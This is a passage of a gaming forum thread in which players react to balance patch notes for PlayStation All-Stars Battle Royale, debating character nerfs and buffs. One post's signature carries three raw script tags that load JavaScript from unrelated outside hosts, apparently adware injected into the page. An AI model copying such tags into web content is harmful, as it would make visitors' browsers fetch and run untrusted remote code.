Survivor
2179 posts

Re: PlayStation All-Stars Battle Royale: Notes on 3/19/13 Balance Patch

Mar 15, 2013

This patch will be like the 1.05 or 1.13 of PSASBR. If you don't know what those are, they were the game breaking patches in Uncharted 2's and Uncharted 3's MP. 1.05 lowered the health in U2 overall (SUCH A BAD CHANGE). 1.13 nerfed the last gun that  actually had to be aimed to be useful and made blindfire the game's most powerful weapon. Both those patches contained content that honestly made or broke the game. Sadly, broke was the verdict. With all these changes, I can guarantee you this: PSASBR will never be the same after. I'm confident that on the 19th, not only will we all be anticipating the store's update with the new DLC, we'll all more than likely be just hoping that this patch will have a positive impact instead of a negative one, like most huge MP patches. As for the notes so far, I like em. The nerfs for the most part aren't too major, which I prefer over under nerfing. Over nerfing leads to people moving on to find a new exploit with a new character, which ultimately leads to the nerf of everything in the entire game. I'm also fine with the buffs for now, even though I have my suspicions about certain ones. My concerns are what they have done with the rest of the cast, Jak getting nerfed and buffed is a HUGE thing, and the fact that Kat seems to be barely be touched also brings up some mixed feelings. BUT the more important thing here is... DANTE BUFFFF!!!!!!!!!!!!!!!!!!!!! Smiley Very Happy

TL;DR: No, read it yourself Smiley Tongue

Message 31 of 429 (10,436 Views)
Lombax Warrior
151 posts

Mar 15, 2013
now to just start a marketing campaign for this game by using "Sora, Spyro, Crash, Lara Croft & Cloud!"

Message 32 of 429 (10,432 Views)
Gaming Beast
2167 posts

Mar 15, 2013

AzurewrathXI wrote:

They seriously buffed good cole? Lol.

And hardly nerfed Evil Coles giga punch. The problem wasn't the punch, it was it being absolutely too fast, too long range, and him popping down oil and just blocking.

This is a joke, and Kat, really? No real nerfs? Just fixing her stuff that made her hard to use? Basically buffed her.

gg anyone facing Kat. No weakness

System changes nerf him pretty hard. 12 frame super upon landing thing = some tether KCs are gone, especially the easy ones.

Thank you Seth for putting this information out.

That being said, is that it for Kat, or is that not including bug fixes? She has a lot of bugs that aren't mentioned in this post...

Not sure how I feel about BD changes. On one hand I'm so happy to see the buffs, but on the other air side triangle got nerfed. That hurts... a lot... I'm honestly not sure if my character got better or worse.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 33 of 429 (10,422 Views)
0 Likes
Gaming Beast
1776 posts

[ Edited ]
Mar 15, 2013

Wow, thanks so much Seth!

Love the changes so far, especially to Dante!!! Can't wait to hear about the changes made to "top tier" characters like Kratos & Raiden!

Oh, and idk if I'm reading too much into this, but it sounds like you guys removed a TON of Kill Confirms!! Smiley Very Happy

Message 34 of 429 (10,420 Views)
0 Likes
Survivor
2457 posts

Mar 15, 2013
the changes to kat seem very small.... grrr
Message 35 of 429 (10,416 Views)
0 Likes
Sackboy
526 posts

Mar 15, 2013
some really good changes here!

lmao hard at drakes barrel
pity with FP's change to forward circle, i was only just starting to learn her and shes pretty fun Smiley Tongue her level 3 will be awesome though
gah the suspense is killing me, upload half the patch notes seth? Smiley Tongue you managed to not give any info on all of my main characters! ...yet

Click the picture for my Tombi Blueprint Thread!! Smiley Happy

HTML tutorial

Message 36 of 429 (10,404 Views)
0 Likes
Sackboy
526 posts

Mar 15, 2013
hrm actually looking at emmett... his rifle needs buffing and his rocket level 1 needs a nerf

Click the picture for my Tombi Blueprint Thread!! Smiley Happy

HTML tutorial

Message 37 of 429 (10,399 Views)
0 Likes
Treasure Hunter
6400 posts

Mar 15, 2013
Alright guys I am surprised nobody noticed this but, they just removed a LOT of kill confirms. With the air to ground super delay, almost every k/c starting from the air is gone now. This includes the empty cancel for Dante, Raiden air side circle, Toro dive kick,etc.

Anyways, I am happy that Fat peice of broken is getting nerfed, could care less if her level 3 is buffed, but I might try and use her again. Drake got some heavy nerfs, Dante is useable now Smiley Happy, and everyone else seems to got a mix of both. They barely touched Kat though (She needs a bit more nerfs), and barely buffed Heihachi (which could be a big problem as well).

I wonder what they are doing to Sackboy and Spike?
Message 38 of 429 (10,387 Views)
0 Likes
Lombax Warrior
195 posts

Mar 15, 2013

AzurewrathXI wrote:

This is a joke, and Kat, really? No real nerfs? Just fixing her stuff that made her hard to use? Basically buffed her.

gg anyone facing Kat. No weakness

They got rid of her infinites and her glitches so no one would exploit that Smiley Tongue Because of that she was considered as game breaking, Kat is very unsafe, she's more like Dante or Nariko, they don't have any priority, but if they get a combo in they can get great AP gain.

Message 39 of 429 (10,404 Views)
I Only Post Everything
949 posts

Mar 15, 2013

sr dan better be revamped i mean he is absolutly terrible, the whole cast of this game are superfast and have a stupid amount of combos while sir dan is the slowest, while in his game he was fast. His moves leave him WIDE open, and his specials are god awful, you'r lucky to get ONE kill with EACH llevel

Omar - "what are you guys doing? Why did you get rid of crash!"
Game devs - "we wanted to put in evil Cole so we had to get rid of everyone else the fans wanted"
Omar- "Oh nice, good idea. I didn't think of that"
Message 40 of 429 (10,408 Views)
0 Likes